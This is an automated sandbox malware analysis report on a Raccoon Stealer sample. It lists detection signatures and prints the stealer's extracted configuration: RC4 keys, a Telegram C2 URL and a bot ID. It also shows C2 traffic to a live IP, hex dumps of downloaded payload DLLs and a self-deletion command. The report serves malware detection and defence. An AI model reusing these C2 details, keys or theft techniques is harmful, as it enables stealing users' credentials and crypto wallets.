Play interactive tour

Edit tour

Windows Analysis Report 8aAG42oIjb.exe

Overview

General Information

Sample Name:	8aAG42oIjb.exe
Analysis ID:	491912
MD5:	613617e5b41e1031a2d72e07afca8c29
SHA1:	a1aaa2b0313898160c5c26b162a17179d4b164bc
SHA256:	889e9ef0fbe47480ebf02cfaa6d9f0516e134f6bcf63783ee5ea135471e147c2
Tags:	exeRaccoonStealer
Infos:
Most interesting Screenshot:

Detection

Raccoon

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Raccoon Stealer

Detected unpacking (changes PE section rights)

Machine Learning detection for sample

Self deletion via cmd delete

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Is looking for software installed on the system

PE file does not import any functions

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Binary contains a suspicious time stamp

PE file contains more sections than normal

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

8aAG42oIjb.exe (PID: 3124 cmdline: 'C:\Users\user\Desktop\8aAG42oIjb.exe' MD5: 613617E5B41E1031A2D72E07AFCA8C29)

cmd.exe (PID: 3144 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\8aAG42oIjb.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 6268 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000000.00000003.659119952.0000000002220000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000000.00000002.674067230.0000000002150000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: 8aAG42oIjb.exe PID: 3124	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.8aAG42oIjb.exe.400000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.8aAG42oIjb.exe.400000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.8aAG42oIjb.exe.2150e50.1.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.8aAG42oIjb.exe.2150e50.1.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.3.8aAG42oIjb.exe.2220000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.3.8aAG42oIjb.exe.2220000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.8aAG42oIjb.exe.2150e50.1.raw.unpack

Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Multi AV Scanner detection for submitted file

Show sources

Source: 8aAG42oIjb.exe	Virustotal: Detection: 32%			Perma Link
Source: 8aAG42oIjb.exe	ReversingLabs: Detection: 57%

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.8aAG42oIjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.2150e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8aAG42oIjb.exe.2150e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8aAG42oIjb.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8aAG42oIjb.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.659119952.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.674067230.0000000002150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8aAG42oIjb.exe PID: 3124, type: MEMORYSTR

Machine Learning detection for sample

Show sources

Source: 8aAG42oIjb.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,	0_2_0042A130
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,	0_2_0040E139
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0040CF54 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,	0_2_0040CF54
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0040F2E6 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,	0_2_0040F2E6
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_0040D684 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,	0_2_0040D684
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,	0_2_00429F5D
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,	0_2_00434A5F
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	Code function: 0_2_00420F09 __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,	0_2_00420F09

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Unpacked PE file: 0.2.8aAG42oIjb.exe.400000.0.unpack

Source: 8aAG42oIjb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49750 version: TLS 1.2

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 8aAG42oIjb.exe, 00000000.00000002.674487590.000000006E630000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: C:\cesuyerew\xebopepuy\vutugiwafotamu\purehuro_bef.pdb source: 8aAG42oIjb.exe
Source:	Binary string: BC:\cesuyerew\xebopepuy\vutugiwafotamu\purehuro_bef.pdb source: 8aAG42oIjb.exe
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 8aAG42oIjb.exe, 00000000.00000002.674339250.000000006E509000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 8aAG42oIjb.exe, 00000000.00000002.674339250.000000006E509000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Source: C:\Users\user\Desktop\8aAG42oIjb.exe

Code function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

0_2_0043EFDD

Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\8aAG42oIjb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49751 -> 185.138.164.150:80
Source: Traffic	Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.4:49751 -> 185.138.164.150:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://t.me/agrybirdsgamerept

Source: Joe Sandbox View

ASN Name: DEPTELECOMNSO-ASRU DEPTELECOMNSO-ASRU

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/p5H3KXwB3dP17SpzXqG4/0082491d8ce92dde3db733700e3efad352687de3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/p5H3KXwB3dP17SpzXqG4/9a5837ddcde370a12fac7d7ad748894e8ca04822 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1418Host: 185.138.164.150

Source: Joe Sandbox View

IP Address: 149.154.167.99 149.154.167.99

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 05:14:05 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 05:14:08 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 